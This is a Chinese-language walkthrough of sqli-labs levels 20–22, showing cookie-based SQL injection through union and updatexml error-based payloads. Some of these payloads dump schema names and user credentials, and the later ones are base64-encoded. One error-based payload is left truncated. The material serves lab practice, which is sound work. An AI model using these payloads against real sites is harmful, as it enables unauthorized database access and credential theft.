Less-20
登陆成功后,出现cookie,登陆失败会显示失败信息
登陆成功后,后台将usename放入cookie中,再次登陆时候只要是cookie没过期,就会去cookie里面取值,然后进行查询
可以使用chrom里面的cookie-editer,使用burpsuite抓包
方法一union联合查询:
Cookie: uname=admi’ order by 3#
当order by x后为3时,不报错,当x为4时,报错,说明栏位为3
查库 Cookie: uname=admi’ union select 1,2,database()#
查表 Cookie: uname='union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'#
查列 uname=adm' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'#
查字段 uname=adm' union select 1,2,group_concat(concat_ws('-',username,password))from security.users#
方法二,报错型注入
查库 Cookie: uname=adm' or updatexml(1,concat(0x7e,database(),0x7e),1)#
查表 Cookie: uname=adm' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
查列 Cookie: uname=adm' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' #
查字段 Cookie:uname=adm' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#
Less-21
输入密码登陆后,可以看到cookie: uname被加密
百度搜索Base64就可以解决,推荐网址https://base64.us/
查表 uname=')union select 1,2,database()#
除了多了一步编码,其他步骤均与第20关类似
Less-22
通过编码测试发现,这一关的包裹是双引号
uname="union select 1,2,database()#
解码为InVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=
其他步骤均与第21关相同